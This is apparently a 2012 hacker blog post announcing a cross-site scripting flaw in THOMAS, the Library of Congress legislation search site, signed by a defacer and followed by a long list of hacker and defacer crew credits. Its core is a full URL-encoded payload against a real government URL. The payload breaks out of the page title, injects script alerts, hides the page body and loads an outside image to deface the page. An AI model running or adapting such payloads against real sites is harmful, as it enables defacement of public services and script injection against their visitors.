THOMAS (The Library of Congress)Cross Site Scripting



# Exploit Title: THOMAS (The Library of Congress)Cross Site Scripting
# Google Dork: -
# Date: 26/3/2012 1:35 AM (Malaysia)
# Author: Ryuzaki Lawlet
# Blog: http://justryuz.blogspot.com
# Tested on: Linux (OSHIRIX)
# CVE : XSS

######Vulnerable########


Vulnerable :  http://thomas.loc.gov/cgi-bin/query/z?c112=


######Live Preview########


Sites: http://thomas.loc.gov/cgi-bin/query/z?c112=%20wo.0t??%20by%20Ryuzaki%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22wo.0t??%20by%20Ryuzaki%22%29%3C/script%3E%3Cscript%3Ealert%28%22http://justryuz.blogspot.com%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cyb3rSec%20Crew%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/277062_207390472645570_423082005_n.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3C/div%3E#185


######Preview########


Screen shot




######Credit########


Antuwebhunt3r| Md Lothdh | Ben CyberSEC | Misa CyberSEC | Sbkiller CyberSEC | Xay CyberSEC | Kejung$ CyberSEC | Biang Rusuh | Afnum vvip | HambaMalam | shah RC | Cak vvip | Lod vvip | Fakyu Tuyu | Alex John NEC | Dark Angel NEC | Cyg Selalu | chliz Aceh | Breackerz Code | Dboyz vvip | AgoenkJR | Misz Nadea | Lone Ranger vvip | Nick Keluang Johor | bl4ckm4gicx NEC | Pak Kordi NEC | b0ogle | Ana dira | pamy | cik din | Jack RC  | Thaqif CyberSEC | Hayate DevilSec  | KiSSierra | Mike | Syakiller | Hidden Pain | Gilang | MagmaCode RC | MASOKISME and all  member | Mambang Oshirix Team | CyberSEC | RileksCrew | Newbie3vilc063s | h3x4 Crew | T3D Hackers | Cyber 4rmy | Indonesia Defacer | Turki Defacer | Pakistan Defacer & Gaza Defacer

Postingan terkait:

Belum ada tanggapan untuk "THOMAS (The Library of Congress)Cross Site Scripting"

Post a Comment